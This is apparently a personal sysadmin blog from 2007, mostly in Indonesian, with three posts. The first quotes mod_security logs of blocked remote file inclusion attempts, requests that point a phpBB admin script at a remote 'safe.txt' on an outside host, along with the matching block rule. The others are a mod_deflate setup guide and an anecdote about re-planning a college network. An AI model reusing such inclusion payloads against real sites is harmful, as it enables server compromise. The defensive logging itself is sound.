When Script Kiddies Attack

wahh……..udah masuk lagi kuliah (walopun jarang kuliah ), hummmm sekitar 1 mingguan ditinggal pulang ni serper, huakakakakak banyak bener log nya.. bejibun!!!! wakakaka emang dasarnya gw yang begok, lupak bikin crontab buat ngerotate log-log bejibun. kmaren gw liat di log webserver (mod security log), mak jang, gileee banyak banget cing!!!!! ampe puyeng gw bacanya………..

kalo gw liat dari log-log, rata rata terjadi attack 15 menit sekali.  mulai dari spam, RFI, LFI.. hummmmmmmmm……… nih sedikit gw kasi lognya (RFI):

==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 – - [24/Oct/2007:23:30:33 +0700] “GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1″ 500 1353 “-” “libwww-perl/5.65″ – “-”
—————————————-
GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxxx.xxxx.xxxxx
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match “phpbb_root_path” at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: “8576a-549-d1366cc0;628b3780″
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
–953aa80c–

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 – - [24/Oct/2007:23:30:34 +0700] “GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1″ 500 1353 “-” “libwww-perl/5.65″ – “-”
—————————————-
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxx.xxxxx.x.x
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match “phpbb_root_path” at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: “8576a-549-d1366cc0;62e80900″
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
–7b81d714–

 (xxxxx.xxxxx.x.x sengaja disamarkan)

itu sih cuman sebagian kecil dari log nya……. kalo gw keluarin disini, bisa mampus ntar yang bacanya -______________-.

tapi yang rada bikin sebel sih, rule buat blocking spam. wah, gila, banyak banget tuh log dari spamm, ada yang ke block, ada yang masih teros nylonong masuk -______________-.

ternyata lebi susah ngamanin web aplication ketimbang yang laen -______-

speed up your apache web access with mod_deflate

mod_deflate?? what is that?.. from apache documentation, mod_deflate is module that provide the deflate output filters that allows output from your webserver to be compressed before being sent to the client over the networks. mod_deflate is additional module in apache. you can enabling or disabling this module up to you. but i recomended you activating this module.How to activating this module, will explained in this blog. just wait and continue reading :p

mod_deflate formerly known as mod_gzip (in apache 1.3). some advantage if you using mod_deflate :

1. minimize bandwidth output from a website.
2. decrease the amount time and data transmitted in networks, resulting faster web access and download for the client.

next, i will explain you how to activating mod_deflate in httpd-2.2.x In this case (my server),installed apache from source (compiled manyally), mod_deflate is disabled , php-mysql enabled,additional apache module-mod_security, and of course FreeBSD!!!!! . Very simple to activating mod_deflate module, just follow this step :

• first, locate mod_deflate.c then go to the directory contain mod_deflate.c files
• path_to_apache_/bin/apxs -cia mod_deflate.c (if you get no errors, congragulations, you have activated mod_deflate module). for ensuring that module has been installed, check your httpd.conf, if you see this line “LoadModule deflate_module modules/mod_deflate.so”, mod_deflate has been installed.

heheheheh……….. we are not finished yet. buy some cigaretes first. heheheheheh lol lol lol lol..

okey, now the most interesting part, adding mod_deflate rules in your httpd.conf. open your httpd.conf and add this line in your document_root path :

<Directory “/web/wiw”>

………..

AddOutputFilterByType DEFLATE text/plain


AddOutputFilterByType DEFLATE text/xml

AddOutputFilterByType DEFLATE text/html


AddOutputFilterByType DEFLATE application/xhtml+xml


AddOutputFilterByType DEFLATE text/css


AddOutputFilterByType DEFLATE application/xml


AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE application/x-httpd-php

</Directory>

close and save your httpd.conf file. restart your apache………

if you wanna see the output benchmark go to this url : http://www.whatsmyip.org/mod_gzip_test/

this tutorial only give you a simple mod_deflate rules……..

hehehehhe…… happy research……….

spaghetti networks

hohohoho…………. whats wrong with the tittle???capek juga ya ternyata nge-blog pake bahasa inggris………..    

hehe……… beberapa minggu ini sering bolak balik stt-stmb….. sumpah capek bener!!!!! malam hari kurang tidur, tidur 2 – 3 jam, jam 8 brangkat………….. arrrggggghhhhhh!!!!! gilaa!!! yahhh…….. itu uda resiko. udah teken kontrak….. (akhirnya bisa cari duit sendiri).humm………. tapi asik juga sih disana, dapet kerjaan yang bener bener bisa nge-upgrade ilmu gw. re-planning the networks !!!! sumpah deh, gw seneng banget bisa dapet job kek gitu…… dulu sih awalnya cuman ditawarin jadi security auditor buat webnya sono. hahahahahah…………… gilaaaaaa!!!!!!!!!!!!!!! awalnya sih gw mikir-mikir ambil job di sono, ah….. tapi udah, gw buletin tekad aja ambil tuh job. hehehehehe…… buat nambahin CV bow….

begitu dateng, oke, gw selesain kerjaan gw. cek the web, setting ulang firewall, tambahin URL filtering, liat log…… tiba tiba, atasan gw mintak lagi tambahan. skalian deh reconfigurasi jaringan. what?????!!!!!! kaget juga sih sebenernya….. tapi disitu coy enaknya, tercapai juga impian gw, bikin jaringan gede!!!!!! huakakaakakakkaakkakak nyombong dikit ga pa pa lah yaaa

pertama gw liat networks diagram, gw rada rada kaget + shock. jaringan kok ancur kek gini (cukup gw aja yang tau………     )!!!!!! dalam hati, gw cuman nyletuk “ni admin kok begok banget ya, nda ada dokumentasi”. kampret lah…………

ya udah, akhirnya gw bilang ke bos. “bos, keknya emang harus di setting ulang deh.” si bos pun akhirnya setuju,disuruh deh bikin networks diagramnya. sip lah!!!! dengan mata yang setengah ngantuk…. di bikin lah tu diagram. huakakaakakkakakakak, dasar emang malem nya ngga tidur, kacau deh jadinya. hmmmm akhirnya gw bawa balik tu kerjaan. sambil siaran radio (pelepas stress), gw bikin ulang tuh skema jaringannya.  finished!! trus kasih deh ke bos, “bos, ni skema jaringan yang baru.” 2 ISP provider buat jaringan stmb. hohohoho…. si bos keknya juga ho oh ho oh aja……. trus si bos mintak yang aneh aneh lagi. server nya ada yang make Windows 2003 server ya + Lotus Domino ya……….. whattt???!!!!!!!! sialan! gw ga pernah megang win 2003 server, apalagi lotus Domino -_____-… huuuuuhhh, nda pa pa lah sekalian belajar….

abis itu, si bos ngomong “lo butuh apa aja??”hehehe…….. bilang aja mintak 2 kompi buat proxy. disetujuin. yang bikin gw rada rada aneh + kaget, si bos mintak box firewall khusus. firewall hardware……. huakakakakakkakakakakakak bingung gw. pake PF ato iptables bisa kok, ngapain beli yang mahal mahal????disuruh deh milih firewall hardware…… Cisco PIX, sonicwall, ato juniper?? wadooohhhh…….. /me nda biasa pegang ketiga nya -__________-, mending pake PF aja !!!!!!

bisa dapet ilmu banyak gw kerja di sono!!! banyak hal-hal baru… apalagi cewe nya juga “ajiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiibbbbbbb!!!!!” haahahhahahahahaha asik lah pokoknya!!!

starting reconfigure the spaghetti networks from now!!!!!!!!!!